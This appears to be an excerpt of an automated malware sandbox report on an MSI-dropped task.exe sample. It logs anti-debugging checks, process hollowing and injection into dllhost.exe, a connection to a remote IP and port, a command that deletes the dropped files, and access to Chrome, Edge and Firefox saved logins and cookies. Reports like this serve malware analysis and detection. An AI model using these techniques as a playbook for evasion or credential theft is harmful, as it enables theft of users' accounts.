                  Source: task.exe, 00000016.00000003.1648607977.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646821801.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1639168513.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1643644507.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.00000000008A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000001F.00000002.1764735514.000000000325C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDPv6 Service Provider
                  Source: svchost.exe, 0000001F.00000002.1764690354.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: task.exe, 0000001E.00000002.4488282758.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8D8D40 LdrInitializeThunk,WSAStartup,WSACleanup,8_2_6C8D8D40
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F84FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C8F84FB
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DB840 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,8_2_6C8DB840
                  Source: C:\Users\user\task.exeCode function: 22_2_0009FDBE mov eax, dword ptr fs:[00000030h]22_2_0009FDBE
                  Source: C:\Users\user\task.exeCode function: 22_2_10004AB4 mov eax, dword ptr fs:[00000030h]22_2_10004AB4
                  Source: C:\Users\user\task.exeCode function: 22_2_0258F829 mov eax, dword ptr fs:[00000030h]22_2_0258F829
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C904D50 GetProcessHeap,HeapAlloc,8_2_6C904D50
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F1134 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C8F1134
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F12F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6C8F12F8
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE984FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6FE984FB
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE912F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_6FE912F8
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE91134 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6FE91134
                  Source: C:\Users\user\task.exeCode function: 22_2_00092484 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00092484
                  Source: C:\Users\user\task.exeCode function: 22_2_000994A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000994A3
                  Source: C:\Users\user\task.exeCode function: 22_2_0009297F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0009297F
                  Source: C:\Users\user\task.exeCode function: 22_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_100060E2
                  Source: C:\Users\user\task.exeCode function: 22_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_10002B1C
                  Source: C:\Users\user\task.exeCode function: 22_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_10002639
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 179.43.171.196 5982
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 20A308F0000 protect: page read and write
                  Source: C:\Users\user\task.exeCode function: 22_2_00076447 GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,22_2_00076447
                  Source: C:\Users\user\task.exeSection loaded: NULL target: C:\Users\user\task.exe protection: execute and read and write
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 20A308F0000
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF733CD14E0
                  Source: C:\Users\user\task.exeCode function: 22_2_00077936 mouse_event,22_2_00077936
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe"
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"
                  Source: C:\Users\user\task.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                  Source: task.exe, 00000016.00000002.4497115014.0000000003660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: task.exe, 00000016.00000002.4497115014.0000000003660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                  Source: task.exe, 00000016.00000002.4490232230.0000000000879000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F141F cpuid 8_2_6C8F141F
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoA,22_2_0006E42E
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,22_2_000AF090
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000A50DE
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AF197
                  Source: C:\Users\user\task.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_000AF264
                  Source: C:\Users\user\task.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,22_2_000AE92C
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AEAFB
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEBA4
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000A4BD6
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEBEF
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEC8A
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,22_2_000AED17
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AEF67
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\task.exeQueries volume information: C:\Users\user\data.bin VolumeInformation
                  Source: C:\Users\user\task.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F0D83 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_6C8F0D83
                  Source: C:\Users\user\task.exeCode function: 22_2_000798EE GetComputerNameExW,GetUserNameW,22_2_000798EE
                  Source: C:\Users\user\task.exeCode function: 22_2_000A5981 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,22_2_000A5981
                  Source: C:\Users\user\task.exeCode function: 24_2_0041739B GetVersionExW,24_2_0041739B
                  Source: C:\Windows\SysWOW64\expand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  Source: C:\Users\user\task.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data22_2_0006B5CA
                  Source: C:\Users\user\task.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\22_2_0006B6E8
                  Source: C:\Users\user\task.exeCode function: \key3.db22_2_0006B6E8
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\safebrowsing
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ca4gppea.default
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\doomed
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\safebrowsing\google4
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\entries
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\thumbnails
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs\browser
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs\browser\newtab
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
